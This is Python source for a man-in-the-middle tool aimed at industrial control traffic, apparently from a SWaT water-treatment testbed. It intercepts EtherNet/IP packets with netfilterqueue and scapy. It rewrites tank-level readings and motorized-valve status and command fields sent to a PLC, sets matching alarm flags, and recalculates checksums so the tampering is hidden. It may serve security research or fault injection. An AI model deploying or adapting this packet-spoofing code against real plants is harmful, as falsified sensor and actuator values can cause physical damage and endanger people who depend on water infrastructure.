def produce():
    """Enqueue a default IP/TCP packet on ``q`` every half second.

    The loop runs until the module-level flag ``off`` is true. At that point
    the function prints a notice, enqueues ``-1`` (presumably an end-of-stream
    marker for whoever reads ``q`` - confirm against the consumer) and returns.
    """
    while not off:
        # Build a packet with default header fields (IP/TCP are presumably
        # the scapy layers - confirm against the file's imports).
        i = 1  # only referenced by the disabled overrides below
        pkt = IP() / TCP()
        # pkt.src = i * 100
        # pkt.dst = i * 200
        # Original author's note: after modifying a field, call show2 so
        # that everything is recalculated.
        pkt.show2()
        q.put(pkt)
        sleep(.5)

    print('putting -1')
    q.put(-1)
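def _clamp_byte(n):
    """Clamp *n* into the 0..255 range written to the MV status/cmd fields."""
    if n > 255:
        return 255
    if n < 0:
        return 0
    return n


def _mutate_lit(packet, pkt):
    """Apply the configured LIT mutation to *pkt* and store it in *packet*."""
    if not (str(pkt.src) == '192.168.1.30'
            and enip_tcp.ENIP_SendRRData in pkt
            and str(pkt.dst) == '192.168.1.10'):
        return

    # device, mutation and value are parallel module-level lists: the entry
    # at the index of 'LIT' selects the mutation code and its operand.
    ind = device.index('LIT')
    mut = mutation[ind]
    val = value[ind]
    if SWAT_LIT not in pkt:
        return

    # inthexToHex / hexTointhex are defined elsewhere; presumably they convert
    # between the on-wire integer encoding and a float level - TODO confirm.
    true_value_tank = inthexToHex(pkt[SWAT_LIT].Pv)
    if mut in ('ASD', 'ALD', 'ARD'):
        mutate_value_tank = true_value_tank + val
    elif mut in ('STZ', 'STO', 'STS'):
        mutate_value_tank = val
    elif mut == 'BSL':
        mutate_value_tank = inthexToHex(rol(pkt[SWAT_LIT].Pv, val, 32))
    elif mut == 'BSR':
        mutate_value_tank = inthexToHex(ror(pkt[SWAT_LIT].Pv, val, 32))
    else:
        # Previously an unrecognised code left mutate_value_tank unbound and
        # raised before the packet received a verdict.
        print('Unknown LIT mutation %r, packet left unchanged' % (mut,))
        return

    pkt[SWAT_LIT].Pv = hexTointhex(mutate_value_tank)
    pkt[SWAT_LIT].Sim_Pv = hexTointhex(mutate_value_tank)

    # Alarm flags follow the new level. Levels from 800 to 1000 match no
    # branch, so control and the four flags stay as they arrived.
    level = int(float(mutate_value_tank))
    flags = None  # (AHH, AH, AL, ALL)
    if level < 250:
        flags = (0, 0, 1, 1)
    elif level < 800:
        flags = (0, 0, 1, 0)
    elif level > 1200:
        flags = (1, 1, 0, 0)
    elif level > 1000:
        flags = (0, 1, 0, 0)
    if flags is not None:
        pkt[SWAT_LIT].control = 1
        pkt[SWAT_LIT].AHH = flags[0]
        pkt[SWAT_LIT].AH = flags[1]
        pkt[SWAT_LIT].AL = flags[2]
        pkt[SWAT_LIT].ALL = flags[3]

    # Dropping the stored checksums makes them get recomputed when the packet
    # is serialised (assuming IP/TCP are scapy layers).
    del pkt[TCP].chksum
    del pkt[IP].chksum
    pkt.show2()
    # NOTE(review): str(pkt) yields the wire bytes on Python 2 only - confirm
    # the interpreter this file targets.
    packet.set_payload(str(pkt))

    spoofed_measurement = inthexToHex(pkt[SWAT_LIT].Sim_Pv)
    print('Changed packet from LIT %1.4f to %1.4f ' % (true_value_tank, spoofed_measurement))
    print("PKT from %s to %s" % (pkt.src, pkt.dst))


def _mutate_mv(packet, pkt):
    """Apply the configured MV mutation to *pkt* and store it in *packet*."""
    if not (str(pkt.src) == '192.168.1.20'
            and enip_tcp.ENIP_SendRRData in pkt
            and str(pkt.dst) == '192.168.1.10'):
        return

    ind = device.index('MV')
    mut = mutation[ind]
    val = value[ind]
    if SWAT_MV not in pkt:
        return

    true_value_motor = pkt[SWAT_MV].status
    if mut in ('ASD', 'ALD', 'ARD'):
        mutate_value_motor = _clamp_byte(true_value_motor + val)
    elif mut in ('STZ', 'STO', 'STS'):
        mutate_value_motor = _clamp_byte(val)
    elif mut == 'BSL':
        mutate_value_motor = rol(pkt[SWAT_MV].status, val, 8)
    elif mut == 'BSR':
        mutate_value_motor = ror(pkt[SWAT_MV].status, val, 8)
    else:
        # Same guard as for LIT: an unknown code no longer raises.
        print('Unknown MV mutation %r, packet left unchanged' % (mut,))
        return

    # status and cmd are both set to the same mutated value.
    pkt[SWAT_MV].status = mutate_value_motor
    pkt[SWAT_MV].cmd = mutate_value_motor

    del pkt[TCP].chksum
    del pkt[IP].chksum
    pkt.show2()
    # NOTE(review): str(pkt) yields the wire bytes on Python 2 only - confirm
    # the interpreter this file targets.
    packet.set_payload(str(pkt))

    spoofed_measurement = pkt[SWAT_MV].status
    print('Changed packet from MV %1.4f to %1.4f ' % (true_value_motor, spoofed_measurement))
    print("packet from %s to %s" % (pkt.src, pkt.dst))


def __extract(packet):
    """Queue callback: rewrite matching LIT/MV readings, then accept the packet.

    The payload of *packet* is parsed with ``IP``. For each of 'LIT' and 'MV'
    listed in the module-level ``device`` list, a frame from the matching
    source address to 192.168.1.10 that carries ``ENIP_SendRRData`` and the
    device layer has its value rewritten according to the paired entries in
    ``mutation`` and ``value``. An unrecognised mutation code leaves the
    frame untouched. Every packet is accepted at the end, modified or not.

    The rewritten frame carries freshly computed IP and TCP checksums, so
    transport-level checks will not flag it; noticing such a change needs an
    integrity mechanism or a plausibility check on the process values.

    Args:
        packet: queue entry providing get_payload(), set_payload() and
            accept().
    """
    pkt = IP(packet.get_payload())

    if 'LIT' in device:
        _mutate_lit(packet, pkt)
    if 'MV' in device:
        _mutate_mv(packet, pkt)

    # then, let the netfilterqueue forward the packet
    packet.accept()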